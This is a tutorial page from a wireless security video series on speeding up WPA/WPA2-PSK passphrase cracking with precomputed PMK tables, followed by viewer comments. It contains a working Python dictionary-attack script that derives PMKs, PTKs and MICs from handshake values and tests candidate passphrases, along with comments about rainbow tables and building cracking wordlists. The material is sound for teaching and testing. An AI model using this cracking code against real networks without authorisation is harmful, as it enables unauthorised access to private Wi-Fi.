Description: Welcome to Part 24 of the WLAN Security Megaprimer! Please start this series by watching Part 1 http://www.securitytube.net/video/1756, if you have not done so already.
In this video, we will look at tools and techniques which can be used to speed up WPA/WPA2 PSK based cracking.
The basic idea is to first understand the dictionary attack in more depth. The CPU- and time-consuming calculation is PBKDF2, which converts the passphrase into the Pre-Shared Key (PSK); in WPA/WPA2-PSK this PSK is also the Pairwise Master Key (PMK). PBKDF2 here runs 4096 rounds of HMAC-SHA1 and outputs a 256-bit key. Apart from the passphrase, the only other variable input to this function is the SSID of the network, so a PMK computed for one SSID is useless against a network with a different SSID. To speed up cracking, we pre-compute the PMKs for probable SSID and passphrase combinations. Now all we have to do for each candidate is combine the variables from the 4-way handshake (ANonce, SNonce, Authenticator MAC, Supplicant MAC) with the candidate PMK to derive the PTK, and verify it using one or more MICs from the handshake. If the MIC matches, our assumed passphrase is correct and the key is cracked!
In the course of this video, we will touch upon the following tools: genpmk, coWPAtty, Pyrit, Airolib-ng and Aircrack-ng. I don't have a monster multi-CPU demon at my disposal, so we will use our slow, 1 GB RAM VM for the demos :)
Look forward to your comments and suggestions!
Tags: wpa-psk , wireless , wifi , security , megaprimer , pbkdf , ptk , pmk , anonce , snonce ,
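The chain described above, written out as an added example (this is not code from the video or from any of the tools it mentions). The MAC addresses, nonces and EAPOL frame are constructed stand-ins for what a sniffer would read from a real 4-way handshake; the PBKDF2 step is checked against the IEEE 802.11 known-answer vector for passphrase "password" and SSID "IEEE". It splits the work the same way genpmk and airolib-ng do: the PMK table is computed once per SSID, and the per-candidate loop only does the PRF and one HMAC.

```python
"""PBKDF2 -> PMK -> PTK -> MIC, the chain a WPA/WPA2-PSK dictionary attack verifies."""
import hashlib
import hmac
import struct

# Constructed stand-ins for values read from a sniffed 4-way handshake
# (hypothetical MACs and nonces, not taken from any real capture).
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
MIC_OFFSET = 81  # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the MIC


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """The expensive step: PBKDF2-HMAC-SHA1, 4096 rounds, 256-bit output.
    In WPA/WPA2-PSK the PSK produced here is the PMK."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def precompute_pmks(ssid: str, wordlist) -> dict:
    """What genpmk / airolib-ng do offline: pay the PBKDF2 cost once per (SSID, passphrase)."""
    return {word: pmk_from_passphrase(word, ssid) for word in wordlist}


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes,
                 nbytes: int = 48) -> bytes:
    """The cheap step: PMK plus handshake values -> PTK (48 bytes for CCMP, 64 for TKIP).
    The first 16 bytes of the PTK are the KCK that keys the EAPOL MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, nbytes)


def build_eapol_msg2(snonce: bytes, version: int = 2) -> bytes:
    """Constructed EAPOL-Key message 2 (supplicant -> AP) with the MIC field zeroed."""
    key_info = 0x0108 | version  # pairwise key, MIC bit set, descriptor version 1 or 2
    body = (b"\x02" + struct.pack(">HHQ", key_info, 16, 1) + snonce
            + bytes(16) + bytes(8) + bytes(8)    # key IV, RSC, key ID
            + bytes(16) + struct.pack(">H", 0))  # MIC placeholder, key data length
    return b"\x01\x03" + struct.pack(">H", len(body)) + body


def eapol_mic(kck: bytes, eapol: bytes, version: int) -> bytes:
    """MIC over the frame with its MIC field zeroed: HMAC-MD5 for descriptor
    version 1 (TKIP), HMAC-SHA1 truncated to 16 bytes for version 2 (CCMP)."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def simulate_handshake(passphrase: str, ssid: str, version: int = 2):
    """Stand-in for the real supplicant: returns (EAPOL frame, MIC) as a sniffer would see them."""
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    eapol = build_eapol_msg2(SNONCE, version)
    return eapol, eapol_mic(kck, eapol, version)


def crack(pmk_table: dict, eapol: bytes, captured_mic: bytes, version: int = 2):
    """The fast inner loop: per candidate only a PRF and one HMAC, no PBKDF2."""
    for passphrase, pmk in pmk_table.items():
        kck = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol, version), captured_mic):
            return passphrase
    return None


if __name__ == "__main__":
    # Known-answer check from the IEEE 802.11 test vectors: "password" / "IEEE".
    print("PMK:", pmk_from_passphrase("password", "IEEE").hex())
    eapol, mic = simulate_handshake("password", "IEEE")
    table = precompute_pmks("IEEE", ["letmein", "12345678", "password", "qwertyui"])
    print("cracked:", crack(table, eapol, mic))
    # The same words precomputed for another SSID match nothing, since the SSID is the PBKDF2 salt.
    print("table for wrong SSID:", crack(precompute_pmks("linksys", table), eapol, mic))
```

Running the script prints the PMK `f42c6fc5...a12e`, then `cracked: password`, then `table for wrong SSID: None`. The last line is the practical caveat for precomputed tables: they are only worth building for SSIDs you expect to meet, which is why tools like genpmk take the SSID as an argument and public table sets target the most common SSIDs.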
Awesome. Thanks again Vivek
Perfect! Go to the next videos.....
Awesome. I'll have to watch it later. Kinda busy, but thanks dude! :D
Thanks again Vivek, awesome video.
Nice video!
I thought we were going to get an encore at the end of this one :-)
I'd just like to say a sincere and heart felt thank you to Vivek. Here is a man who appears to be in the process of setting up his own business, but still finds space in his schedule to give over lots of his time to provide free, high quality videos and training on interesting and relevant subjects.
His range of videos is unique and he takes us all on a voyage of discovery with a cheerful smile - whilst effortlessly getting the key points across and instilling knowledge.
Over many months I've watched videos from Vivek and other Security Tube contributors and I'm astounded at what I've learned - even an old guy like me.
Naturally many of us have learned the tricks of the trade in attacking/testing Wireless networks here - but more importantly we have learned steps to take to SECURE wireless without even realising it. Many of us have become fluent in using tools like Wireshark, the Aircrack suite and the like. We have seen Python and many of us are now dabbling with it. We've learned many tricks and gained new skills all because of this man's selflessness and spirit of giving.
Vivek Ramachandran. Your work is inspirational, your skills are exemplary. You are both hero and genius to many of us, and remain kind, charitable and keep your feet on the ground in your dealings with us all. I can only imagine your parents and family are very proud of you.
'Thank you' never really seems enough for what you have done for so many people - but Vivek, Thank You.
In total agreement with Blackmarketeer. I couldn't have said it better myself
@Blackmarketeer very nicely said :) I couldn't agree more :)
@everybody I would suggest using questions.securitytube.net for discussions about videos, coding etc so we get them started again. Think of it as something like a forum where you can communicate and work together on challenges, problems etc.
@Blackmarketeer: I could not say it in a better way!
@Vivek: awesome as always. Was this the last video of the megaprimer, or will there be a next video?
@Blackmarketeer: very eloquent. I have nothing but admiration for Vivek's knowledge, enthusiasm and generosity.
@Vivek: As I watched this video, something popped into my head! I know you dealt with the concept of a fake AP using airbase-ng and the honeypot can be open or configured with WEP. As far as I know, it won't work with WPA/WPA2 so I wonder if there are any tricks up your sleeve to create a WPA/WPA2 fake AP?
Another great video Vivek, the videos just keep getting better.
@Blackmarketeer... I could not have said it any better than the way you did, very admirable.
--Chard
Does anyone know how to kill the X server in BT5 running in VirtualBox? Because I was going to do a video of my machine running genpmk as Vivek suggested in this vid. I'm trying to install the NVIDIA drivers for my 260 GTX.
Thanks
--Chard
@Vivek I think you are not a normal human being, you are a MIRACLE that happened to us. Big big big greetings and thank you
@everyone i have 40GB of rainbow tables....i will give you one direct link for them ASAP....Thanks
@Blackmarkteer, I just couldn't agree more.
Vivek, I have just started to watch your videos. Man, you are great. I had been looking for this type of videos for a long time and now I am in the right place. Thank you very much.
One word: Awesome!
BTW, are you going to do a video on your solution to the challenge?
@WCNA; yes, he will this week, he said so in another post.
Vivek, you mentioned in video 16 how you can tell whether a probe request was WEP or WPA, and that this would be covered in a later video. I have tried to use WiFishfinder, but have so far failed. Anybody know of a way to distinguish between WEP and WPA probes?
Vivek!, as always a wonderful video!. By the way I just pre-ordered your book: Backtrack 5 Wireless Penetration Testing Beginner's Guide, and here's the link for everyone to go and do the same! It's the least we can do to support Vivek and his efforts! So everyone hit the link and pre-order the book!!!!
http://www.packtpub.com/backtrack-5-wireless-penetration-testing-beginners-guide/book?monthly=true#in_detail
Chard: just log out. :) Anyway, you can't use CUDA tools in a virtual machine as it doesn't have support for your internal video card, as far as I know.
Thanks esojzuir ......I just ordered it. It's the least I can do considering all the free training Vivek has given us.
@mgsyd, soheil.r, allisonmagicelite, m0ei, Casey, Wavelength, Netinfinity, 3IL060, Chard, ahmadqdemat, jib, i7-Cud4 Thanks guys :) Your appreciation is always appreciated and keeps me going!
@Blackmarketeer Thanks my friend. Really appreciate you taking the time to write this :) I hope I can always live up to all your expectations and continue to do this forever! As a reply to this I will post a PPT on why I started SecurityTube, the vision and what I am planning to do with it :) Stay tuned.
@esojzuir Thanks for letting me know this was out (yes! I did not know). The publisher had said the pre-orders would be out soon but I did not know if it was actually online :)
@esojzuir, WCNA Thanks for pre-ordering guys! To be honest, I do not expect anything in return for these videos. I will explain the reason I do what I do in a video soon :)
Challenge Solution posted (theory): http://www.securitytube.net/video/1919
@Ignatius Your questions will be answered in the next video! :)
Next video in the series has been posted: http://www.securitytube.net/video/1920 ! This deals with how to find which security setting the client has in its profile and how to exploit even WPA/WPA2 profiles.
@Ignatius this one is for you :)
like your videos ,Vivek.. :))
@esojzuir: thanks for the link - count me in to get one pre-ordered.
@Vivek: it seems that our minds are in sync! I've been researching TKIP and CCMP further and know that you're planning to cover these topics too. You estimated 22 videos in the series and we're already well past that. Maybe we should all have a guess about how moany there will be? There are so many interesting elements to this fascinating topic.
Drat - *many* not *moany*!
If only there was an edit function! I know that you're planning to resurrect (and maybe code?) a formal forum in due course.
Any suggestions on how to speed up airolib-ng? At the start it seems to be processing around 2000 or so passwords a second from the list file, but once it gets up to around 100 million processed it seems to slow down a ton. It is a 10GB list, but still it shouldn't slow down that much with 8GB of RAM on an i7.
Here is a brief video I made that shows how to use CUDA to speed up PMK generation.
It seems that an nVidia 295GTX is 7 times faster than an i7 920 CPU.
http://www.youtube.com/watch?v=Nbu011NYa_c
Hello everyone, big thanks to Vivek who is doing an incredible job on this site, I am amazed! And I am very impressed with the community on this site, which is very hard to find on the net!! It looks like everyone is working together to hit the target :-) and I thank you so much for sharing the knowledge.
I have only one question: can we use the same precomputed PMK dictionary file against another AP which has a different ESSID? If yes, how can it be done? Thanking you in advance.
Really, this site is great. I think Vivek is an outstanding man. He wants to share his knowledge for free. For a long time I kept looking for tutorials like this. Awesome, great. I keep waiting for another series.
Someone, possibly the Shmoo Group, has created rainbow tables for the top 1000 SSIDs and a large list of passwords. They can be torrented online or ordered as DVDs.
Renderlab sorry.
http://www.renderlab.net/projects/WPA-tables/
I should have waited until the end :)
Sir, I don't know if I should post this question right now, but I was not able to get an association with WPA2-PSK with cipher CCMP.... I don't know why there are no EAPOL packets... Can anyone tell me why this is happening? No EAPOL packets.
First of all, I'd like to thank Vivek for these videos.
After that, if you permit, I have a question! Is it possible to find a key such as: "#g¤¤d m¤rn!ng €v€r¥b¤d¥#"?
Sorry for my writing, because I don't speak English very well!
Thank you very much ! :)
Hi sir, I want to call you "master", it's my honor. I have watched up to this topic, but I am so confused about how I can produce a big dictionary to supply the brute force method to crack WPA2-PSK. The passphrase can be anything. I know you mentioned that most of the time it is easy, but people are used to mixing words and numbers, and I don't know how to supply such a dictionary or passphrase list. I surfed the web, but anyway I didn't find a useful link or information. Please help me to understand. Thanks in advance.
thank you so much